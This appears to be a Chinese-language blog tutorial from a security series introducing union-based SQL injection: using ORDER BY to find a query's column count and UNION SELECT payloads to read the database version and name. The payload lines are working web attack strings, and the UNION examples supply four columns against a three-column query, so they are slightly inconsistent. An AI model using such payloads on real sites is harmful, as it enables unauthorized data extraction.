SQL Injection pattern〈一〉

DAY 9

駭客手法解析~你不能不知的資安問題!!系列第 9 篇

鐵人賽

thankgod

2014-10-09 23:37:13

1494 瀏覽

分享至

利用工具

推薦駭客必備工具： Hacker Bar

Windows 下快捷鍵：

Alt + A：Load URI

Alt + S：Parameter-Parser

Alt + X：Send Request

資料萃取

Union based：通常如果有 SQL 結果返回就可利用，是最簡易且方便的技巧。

關鍵字為 Union ，但子句需要同樣個數的 column 以正確返回聯集的結果。

獲得 column 個數技巧：

select A, B, C from test where A = 1 order by 10 <- 返回錯誤頁面代表 column 個數可能大於也可能小於10

select A, B, C from test where A = 1 order by 1 <- 返回正確頁面代表 column 個數大於1

select A, B, C from test where A = 1 order by 4 <- 返回錯誤頁面代表 column 個數小於4

select A, B, C from test where A = 1 order by 3 <- 返回正確頁面代表 column 個數等於3

union 利用：

獲取 SQL Version：

select A, B, C from test where A = 1 and 1=2 union select version(), NULL, NULL, NULL

獲取 name of current database：

select A, B, C from test where A = 1 and 1=2 union select database(), NULL, NULL, NULL

SQL Injection 介紹

SQL Injection pattern〈二〉

系列文

駭客手法解析~你不能不知的資安問題!! 共 30 篇

RSS系列文訂閱系列文

9 人訂閱

完整目錄

直播研討會

{{ item.channelVendor }} {{ item.webinarstarted }} |

直播中

尚未有邦友留言

立即登入留言

參賽組數

1064 組

團體組數

40 組

累計文章數

22190 篇

完賽人數

601 人

15th鐵人賽 16th鐵人賽 13th鐵人賽 14th鐵人賽 12th鐵人賽 11th鐵人賽鐵人賽 2019鐵人賽 javascript 2018鐵人賽 python 2017鐵人賽 windows php c# windows server linux css react vue.js

IT邦幫忙

駭客手法解析~你不能不知的資安問題!!系列 第 9 篇